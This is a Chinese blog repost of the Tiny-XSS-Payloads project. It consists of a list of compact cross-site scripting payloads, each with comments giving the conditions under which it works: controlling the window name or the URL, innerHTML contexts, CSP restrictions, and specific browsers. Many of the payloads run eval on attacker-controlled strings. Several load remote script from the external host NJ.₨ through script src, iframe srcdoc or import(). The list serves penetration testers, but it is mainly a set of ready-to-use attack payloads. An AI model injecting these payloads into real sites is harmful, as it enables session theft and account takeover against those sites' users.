首页 > 其他分享 >Tiny XSS Payloads 微型XSS代码

Tiny XSS Payloads 微型XSS代码

时间:2024-08-01 17:52:39浏览次数:17  
标签:XSS 微型 terjanq Payloads https Tiny

项目地址

GitHub:

https://github.com/terjanq/Tiny-XSS-Payloads

网站地址

https://tinyxss.terjanq.me

截图

 


payload列表

当前有效载荷

<!-- 如果你控制URL -->
<svg/onload=eval(`'`+URL)>
<!-- 仅在反射型跨站脚本攻击(Reflected XSS)场景下有效 -->
<svg/onload=eval(name)>
<!-- 如果你控制名称,但未启用 unsafe-eval -->
<svg/onload=location=name>
<!-- 在Chrome中,即使在尚未插入DOM的元素内部也能生效 -->
<svg><svg/onload=eval(name)>
<!-- 如果你控制窗口名称,这个载荷将在innerHTML内生效,即使在尚未插入DOM的元素内部也是如此 -->
<audio/src/onerror=eval(name)>
<!-- 如果你控制URL,这个载荷将在innerHTML内生效,即使在尚未插入DOM的元素内部也是如此 -->
<img/src/onerror=eval(`'`+URL)>
<!-- 仅仅是一个普通的脚本 -->
<script/src=//NJ.₨></script>
<!-- 如果你控制窗口名称 -->
<iframe/onload=src=top.name>
<!-- 如果你控制URL -->
<iframe/onload=eval(`'`+URL)>
<!-- 如果页面上iframe数量是固定的 -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- 仅适用于Firefox -->
<iframe/srcdoc="<svg><script/href=//NJ.₨ />">
<!-- 如果页面上iframe数量是随机的 -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- 如果CSP中禁用了unsafe-inline且允许外部脚本 -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- 如果允许内联样式 -->
<style/onload=eval(name)>
<!-- 如果允许内联样式且可以控制URL -->
<style/onload=eval(`'`+URL)>
<!-- 如果阻止了内联样式 -->
<style/onerror=eval(name)>
<!-- 使用外部脚本作为导入,不适用于innerHTML -->
<!-- 该PoC仅在https和Chrome下有效,因为NJ.₨会检查Sec-Fetch-Dest头部 -->
<svg/onload=import(/\\NJ.₨/)>
<!-- 使用外部脚本作为导入,如果允许内联样式则触发 -->

使用外部脚本作为导入

<!-- 该PoC仅在https和Chrome下有效,因为NJ.₨会检查Sec-Fetch-Dest头部 -->
<style/onload=import(/\\NJ.₨/)>
<!-- 该PoC仅在https和Chrome下有效,因为NJ.₨会检查Sec-Fetch-Dest头部 -->
<iframe/onload=import(/\\NJ.₨/)>

已删除

<!-- 如果你控制URL,仅限Safari -->
<iframe/onload=write(URL)>
<!-- 如果允许内联样式,仅限Safari -->
<style/onload=write(URL)>

标签:XSS,微型,terjanq,Payloads,https,Tiny
From: https://www.cnblogs.com/lusuo/p/18337179

相关文章

  • 安全测试--常见漏洞--XSS
    漏洞简介Cross-SiteScripting(为了与CSS区别,安全领域叫做XSS)攻击是注入的一种,主要是将恶意脚本注入到可信站点的HTML页面等网页文件中,当攻击者将带有恶意脚本的网页链接发送给用户,用户打开链接,浏览器会认为恶意脚本来自可信站点而执行举个例子 @app.route("/")defindex():......
  • 五分钟带你了解XSS攻击!
    XSS(跨站脚本攻击)什么是XSS?一、定义和概述跨站脚本攻击(XSS)是一种安全漏洞,它允许攻击者将恶意客户端代码注入网站。此代码由用户执行,让攻击者绕过访问控制并冒充用户。如果Web应用程序没有采用足够的验证或编码,则这些攻击会成功。用户的浏览器无法检测到恶意脚本是不可信......
  • 【深海王国】小学生都能玩的单片机!番外1:Arduino家族Uno-Mega-Nano-Pro Mini-ATtiny85
    Hi٩(๑^o^๑)۶,各位深海王国的同志们,早上下午晚上凌晨好呀~辛勤工作的你今天也辛苦啦(o゜▽゜)o☆今天大都督继续为大家带来单片机的番外系列——小学生都能玩的单片机!番外1带你快速学习认识Arduino家族:Uno、Mega、Nano、ProMini、ATtiny85,了解它们的使用场景与优......
  • 开源项目tiny11builder对Windows11进行精简
    由于采用的是Powershell脚本,系统默认的策略是阻止运行的,需要以管理员身份运行Powershell后,输入以下命令:1Set-ExecutionPolicyunrestricted将「tiny11builder」解压,在文件“tiny11maker.ps1”上鼠标右键→使用PowerShell运行。   提前下载好官方原版W......
  • 如何解决XSS攻击
    跨站脚本攻击(Cross-SiteScripting,XSS)是一种常见的网络安全威胁,它允许攻击者将恶意脚本注入到看似可信的网站中。这些脚本可以窃取用户数据、破坏网站功能,甚至冒充用户执行操作。本文将详细介绍XSS攻击的不同类型及其防御策略,并提供具体的代码示例。XSS攻击概述XSS攻击......
  • 【WAF剖析】10种XSS某狗waf绕过姿势,以及思路分析
    原文:【WAF剖析】10种XSS绕过姿势,以及思路分析xss基础教程参考:https://mp.weixin.qq.com/s/RJcOZuscU07BEPgK89LSrQsql注入waf绕过文章参考:https://mp.weixin.qq.com/s/Dhtc-8I2lBp95cqSwr0YQw复现网站安全狗最新v4.0已经准备好image-20240722104320515这里用xssla......
  • xss flash钓鱼拿到主机控制权
    第一步:本机已经开启phpstudy的web服务第二步:下载Flash项目源码文件,并部署在网站根目录下,访问项目地址:https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash第三步:来到xssaq平台,点击公共模块---flash弹窗钓鱼-查看将其中的代码保存成js文件放到我们网站的根......
  • 利用蓝莲花BlueLotus通过XSS获取Cookie
    蓝莲花BlueLotus_XSSReceiver清华大学蓝莲花战队做的一个平台,优点是足够小,不需要数据库,只要有个能运行php的环境就可以了,缺点是一般只适合一个人用。配置蓝莲花拉取dockerdockerpullromeoz/docker-apache-php:5.6上传文件文件下载地址:https://github.com/trysec/......
  • xss--flash钓鱼
    一.本机下载小皮面板开启环境     二.下载flash源文件下载地址:crowsec/crowsec_FakeFlashatmaster·crow821/crowsec·GitHub三.下载完成把网站部署在phpstudywww根目录下四新建一个1.js文件然后在xss平台找到flash弹窗钓鱼然后查看他的源代码复制到......
  • 无法更新 Python MySQL 中的tinyint
    我无法使用以下代码更新我的Tinyint值(valid_state):importmysql.connectormydb=mysql.connector.connect(host="localhost",user="mahdi",passwd="Abcd@1324",database="mycustomers")mycursor=mydb.cursor()sql="UPDATE`......